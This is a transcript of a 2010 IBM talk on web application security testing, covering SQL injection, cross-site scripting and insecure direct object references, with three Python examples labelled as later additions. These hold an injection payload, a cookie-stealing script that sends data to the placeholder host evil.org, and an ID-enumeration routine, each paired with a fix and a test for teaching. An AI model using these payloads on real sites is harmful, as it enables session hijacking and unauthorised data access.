Get Ready for Web Application Security Testing

IBM Software Group, © 2010 IBM Corporation. Get Ready for Web Application Security Testing. Alan Kan, Technical Manager, IBM Rational Software, [email protected]

Uploaded by alan-kan on 14-May-2015, category Technology.

DESCRIPTION

Presented at Testing Professional Network in Auckland, New Zealand at 16 Feb 2010.

TRANSCRIPT

Page 1: Get Ready for Web Application Security Testing

®

IBM Software Group

© 2010 IBM Corporation

Get Ready for Web Application Security Testing

Alan Kan, Technical Manager, IBM Rational Software, [email protected]

Page 2: Get Ready for Web Application Security Testing

IBM Software Group | Rational software

Run Down

The Security Landscape

What does it mean for Testing Professionals

A Few Top Attacks and How to Test for Them

What You Can Do to Prepare for Security Testing

Pages 3 to 5 (image-only slides)

Page 6

The Web Ecosystem (Simplified)

Pages 7 and 8 (image-only slides)

Page 9

News headlines shown on the slide:

LexisNexis Data Breach (Washington Post, Feb 17, 2008)

IndiaTimes.com Malware (InformationWeek, Feb 17, 2008)

Hacker breaks into Ecuador's presidential website (Thaindian, Feb 11, 2008)

Hacking Stage 6 (Wikipedia, Feb 9, 2007)

Hacker steals Davidson Cos client data (Falls Tribune, Feb 4, 2008)

RIAA wiped off the Net (TheRegister, Jan 20, 2008)

Chinese hacker steals 18M identities (HackBase.com, Feb 10, 2008)

Mac blogs defaced by XSS (The Register, Feb 17, 2008)

Your Free MacWorld Expo Platinum Pass (CNet, Jan 14, 2008)

Hacker takes down Pennsylvania gvmt (AP, Jan 6, 2008)

Drive-by Pharming in the Wild (Symantec, Jan 21, 2008)

Italian Bank hit by XSS fraudsters (Netcraft, Jan 8, 2008)

Greek Ministry websites hit by hacker intrusion (eKathimerini, Jan 31, 2008)

Page 10

What about in this part of the world?

“JB Hi-Fi's websites in Australia and New Zealand were redirecting customers to malicious web pages over the weekend in a cyber attack” (stuff.co.nz, 01/12/2009)

“Turkish defacers broke into the New Zealand based registrar Domainz.net … Companies which had their New Zealand web sites defaced include Microsoft, HSBC, Coca-Cola, F-secure, Bitdefender, Sony and Xerox” (zone-h.org/news/id/4708, 21/04/2009)

“Security Intelligence Service director Warren Tucker revealed government department websites had been attacked and information stolen” (nzherald.co.nz, 12/09/2007)

“A florist which does all of its business online has had its website targeted by hackers and customers' credit card details have been stolen” (abc.net.au, 16/9/2007)

“Computer hackers have cracked the defences of dozens of top government and business sector internet sites this year, raising concerns about the safety of consumers' financial and personal information” (SMH.com.au, 14/10/2007)

Pages 11 and 12 (image-only slides)

Page 13

Web Application Security is Neglected

75% of all attacks on information security are directed at the web application layer.

2/3 of all web applications are vulnerable.

Security Spending (network/server vs web applications):

                      % of Attacks    % of Dollars
Web Applications          75%             10%
Network / Server          25%             90%

Page 14

Run Down

The Security Landscape

What does it mean for Testing Professionals

A Few Top Attacks and How to Test for Them

What You Can Do to Prepare for Security Testing

Page 15

Secure Applications – Who is Responsible?

System Administrator?

Network Administrator?

Security Professional?

Solution Architect?

Developers?

Testing Professional?

Page 16

The Trend – Incorporate Security into Testing

(Diagram of the SDLC: Build, Coding, QA, Security, Production; developers are labelled against the early stages.)

Incorporate security as part of testing.

Ensure vulnerabilities are addressed before applications are put into production.

Page 17

Security Testing Steps are not that different from usual

Identify possible vulnerability

Prove vulnerability

Assess risk, scope, depth, severity and impact

Create repeatable tests

Test mitigation and fixes

Page 18

Run Down

The Security Landscape

What does it mean for Testing Professionals

A Few Top Attacks and How to Test for Them

What You Can Do to Prepare for Security Testing

Page 19

OWASP and the OWASP Top 10 list

Open Web Application Security Project – an open organization dedicated to fighting insecure software

“The OWASP Top Ten document represents a broad consensus about what the most critical web application security flaws are”

Page 20 (image-only slide)

Page 21

1 - Injection Flaws

What is it? User-supplied data is sent to an interpreter as part of a command, query or data.

What are the implications? SQL Injection – Access/modify data in DB

SSI Injection – Execute commands on server and access sensitive data

LDAP Injection – Bypass authentication

Page 22

SQL Injection

User input inserted into SQL command (get product details by id):

Select * from products where id='$REQUEST["id"]';

Hack: send param id with value  ' or '1'='1

Resulting executed SQL:

Select * from products where id='' or '1'='1'

All products returned
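The query above, carried through as an added example that is not part of the presentation: a Python script against an in-memory SQLite table. The product rows, the function names and the `is_injectable` check are all constructed here, and the slide's PHP-style `$REQUEST["id"]` becomes a plain function argument. It shows the tautology payload returning every row, the same lookup with a bound parameter returning nothing, and the repeatable test a tester keeps (the "create repeatable tests" and "test mitigation and fixes" steps from page 17).

```python
import sqlite3

# Constructed sample data, not from the presentation.
PRODUCTS = [(1, "Widget", 9.99), (2, "Gadget", 19.99), (3, "Gizmo", 29.99)]

# The payload from the slide: id = ' or '1'='1
PAYLOAD = "' or '1'='1"


def make_db():
    """In-memory products table seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def product_by_id_vulnerable(conn, product_id):
    """Builds the query by string concatenation, the pattern on the slide.

    Whatever the caller sends is parsed as SQL, so a closing quote in
    the input ends the literal and the rest becomes part of the WHERE.
    """
    sql = "SELECT * FROM products WHERE id='" + product_id + "'"
    return conn.execute(sql).fetchall()


def product_by_id_safe(conn, product_id):
    """Same lookup with a bound parameter.

    The value travels to the engine separately from the statement text,
    so it can only ever be compared against the id column, never parsed.
    """
    sql = "SELECT * FROM products WHERE id=?"
    return conn.execute(sql, (product_id,)).fetchall()


def is_injectable(lookup, conn):
    """Repeatable test for a single-record lookup.

    A lookup that returns more rows for the tautology payload than for a
    legitimate id has provably let the input alter the query. Returns
    True when the lookup is vulnerable.
    """
    baseline = lookup(conn, "1")
    attacked = lookup(conn, PAYLOAD)
    return len(attacked) > len(baseline)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", product_by_id_vulnerable(db, PAYLOAD))  # all 3 rows
    print("safe:      ", product_by_id_safe(db, PAYLOAD))        # []
    print("injectable?", is_injectable(product_by_id_vulnerable, db),
          is_injectable(product_by_id_safe, db))
```

The tautology is the quickest proof when results are echoed back. When they are not, the same test is run with a lone `'` (looking for a database error in the response) or a time-delay payload, and the fix is the same: bind parameters, and never rebuild the query from request strings.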

Page 23

SQL Injection Example I (image-only slide)

Page 24

SQL Injection Example II (image-only slide)

Page 25

SQL Injection Example - Exploit (image-only slide)

Page 26

SQL Injection Example - Outcome (image-only slide)

Page 27

Injection Flaws – SSI Injection Example: creating commands from input

Page 28

The return is the private SSL key of the server

Page 29

2 - Cross-Site Scripting (XSS)

What is it? Malicious script echoed back into HTML returned from a trusted site, and run under that site's trusted context.

What are the implications? Session tokens stolen (browser security circumvented)

Complete page content compromised

Future pages in browser compromised

Page 30

Cross Site Scripting – The Exploit Process

(Diagram with three parties: Evil.org, the User, and bank.com)

1) Link to bank.com sent to user via e-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user's cookie and session information without the user's consent or knowledge

5) Evil.org uses stolen session information to impersonate user

Page 31

XSS Example I

HTML code:

Page 32

XSS Example II

HTML code:
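The reflected XSS described on pages 29 and 30, as an added example that is not part of the presentation (the HTML on the two example slides is not in this transcript, so this is a constructed page, not the one shown). A Python function stands in for a bank.com page that greets the visitor by the `name` it was sent; `evil.org` is the slide's own placeholder for the attacker's host, and the probe marker, function names and the cookie-stealing script are all constructed here. It shows the script coming back verbatim from the vulnerable page, the same page with the input HTML-encoded, and the reflection check a tester keeps as a repeatable test.

```python
import html

# Step 2 of the slide's exploit process: the script the attacker embeds in
# the link to bank.com. It ships document.cookie to evil.org (the slide's
# placeholder for the attacker's host) by loading an image from there.
COOKIE_STEALER = (
    "<script>new Image().src='http://evil.org/steal?c='"
    "+encodeURIComponent(document.cookie)</script>"
)


def greeting_page_vulnerable(name):
    """Constructed bank.com page that echoes the request parameter as-is.

    Whatever arrives in `name` becomes markup, so a <script> in it runs
    in bank.com's origin with access to bank.com's cookies (step 3).
    """
    return "<html><body><h1>Welcome, " + name + "</h1></body></html>"


def greeting_page_safe(name):
    """Same page with the input HTML-entity encoded before insertion.

    html.escape turns < > & " ' into entities, so the browser renders the
    payload as text instead of parsing it as a tag. This encoder is right
    for element content; attribute, JavaScript and URL contexts each need
    their own.
    """
    return ("<html><body><h1>Welcome, "
            + html.escape(name, quote=True)
            + "</h1></body></html>")


def is_reflected_unencoded(render, probe="<xss-probe-4711>"):
    """Repeatable test: send a harmless marker containing angle brackets
    and see whether it returns byte-for-byte. If it does, the same slot
    will carry a real script tag; if it returns encoded, it will not.
    Returns True when the page is vulnerable.
    """
    return probe in render(probe)


if __name__ == "__main__":
    print(greeting_page_vulnerable(COOKIE_STEALER))  # script intact
    print(greeting_page_safe(COOKIE_STEALER))        # &lt;script&gt;...
    print(is_reflected_unencoded(greeting_page_vulnerable),
          is_reflected_unencoded(greeting_page_safe))
```

The probe deliberately carries no script: proving reflection is enough to record the finding, and the marker does not trip up a shared test environment. Encoding on output fixes the page; marking the session cookie HttpOnly limits what step 4 can steal but does not remove the XSS.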

Page 33

4 - Insecure Direct Object Reference

What is it? Part or all of a resource (file, table, etc.) name controlled by user input.

What are the implications? Access to sensitive resources

Information Leakage, aids future hacks
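The flaw defined above, as an added example that is not part of the presentation (the three example slides that follow are images and are not in this transcript). The invoice records, user names and function names are all constructed here. It shows a lookup that uses the id from the request directly as the record key, the same lookup with an ownership check, and the enumeration a tester runs to prove it: walk a range of ids as one user and see which records that belong to someone else come back.

```python
# Constructed sample store: invoices keyed by a guessable sequential id,
# each owned by one user. Think of the request as /invoice?id=1002.
INVOICES = {
    1001: {"owner": "alice", "total": 120.00},
    1002: {"owner": "bob", "total": 87.50},
    1003: {"owner": "alice", "total": 33.10},
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested record."""


def get_invoice_vulnerable(current_user, invoice_id):
    """The id from the URL is used as the key with no ownership check.

    Any authenticated user can read any invoice by changing the number,
    and the sequential ids make the whole table trivial to walk.
    """
    return INVOICES[invoice_id]


def get_invoice_safe(current_user, invoice_id):
    """Looks the record up, then checks that the caller owns it.

    A record owned by someone else gets the same response as an id that
    does not exist, so the check does not leak which ids are in use.
    """
    record = INVOICES.get(invoice_id)
    if record is None or record["owner"] != current_user:
        raise Forbidden(f"invoice {invoice_id} not accessible to {current_user}")
    return record


def enumerate_as(user, getter, id_range):
    """Repeatable test: request every id in the range as `user` and return
    the ids of records that came back but belong to another user. An
    empty list means the access check held for the whole range.
    """
    leaked = []
    for invoice_id in id_range:
        try:
            record = getter(user, invoice_id)
        except (KeyError, Forbidden):
            continue
        if record["owner"] != user:
            leaked.append(invoice_id)
    return leaked


if __name__ == "__main__":
    print("bob sees via vulnerable lookup:",
          enumerate_as("bob", get_invoice_vulnerable, range(1000, 1010)))
    print("bob sees via safe lookup:      ",
          enumerate_as("bob", get_invoice_safe, range(1000, 1010)))
```

The test needs two accounts so that "came back but belongs to someone else" can be decided; in a real engagement one account creates the records and the other attempts to read them. Replacing the sequential id with a random or per-user indirect reference raises the cost of enumeration, but the server-side ownership check is the fix.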

Page 34

Insecure Direct Object Reference - Example (image-only slide)

Page 35

Insecure Direct Object Reference – Example Cont. (image-only slide)

Page 36

Insecure Direct Object Reference – Example Cont. (image-only slide)

Page 37

Run Down

The Security Landscape

What does it mean for Testing Professionals

A Few Top Attacks and How to Test for Them

What You Can Do to Prepare for Security Testing

Page 38

Get Educated on the Topic

Beware of legal issues (test only systems you are authorised to test)

Create a sandpit environment

Know the latest trends – IBM X-Force Threat Reports: http://www-935.ibm.com/services/nz/iss/xforce/trendreports/

Study past and current exploits – US Computer Emergency Readiness Team: http://www.kb.cert.org/vuls

Learn how to test for the vulnerabilities – OWASP Testing Guide: http://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents

Learn the syntax of operating systems, databases and programming languages

Experiment with tools – OWASP WebScarab: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

Experiment with tools – IBM Rational AppScan: http://www-01.ibm.com/software/rational/offerings/websecurity/webappsecurity.html

Page 39

How Does an Automated Tool Work? (image-only slide)

Page 40

Get Tools – which ones?

Automated vs manual:
- Do it a lot quicker, in a shorter timeframe
- Regression tests
- Recommendations

Security-specific vs general automated testing tool:
- Time it takes to become a security expert
- Time it takes to learn coding
- Time it takes to create report templates
- Fix recommendations
- Hard to reach places – malware, Flash
- Still needs a human being to validate results

Commercial vs free tools:
- It costs
- Regular updates
- Usability, quality

Page 41

Tools

Manual testing:
- OWASP WebScarab: http://www.owasp.org/index.php/Category:OWASP_Project
- Firebug: http://getfirebug.com

Automated testing:
- IBM Rational AppScan: http://www-01.ibm.com/software/rational/offerings/websecurity/webappsecurity.html

Page 42

© Copyright IBM Corporation 2010. All rights reserved.

The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way.

IBM, the IBM logo, the on-demand business logo, Rational, the Rational logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Page 43

IBM Rational AppScan

The undisputed market leader: ranked #1 in market share by IDC; #1 in numerous industry “bake offs”

Automatically scans web applications for vulnerabilities: SQL injection, cross-site scripting

Provides clear recommendations on how to fix them, e.g. character sanitization

The result? Improved security, lower costs, and the ability to meet PCI standards for application security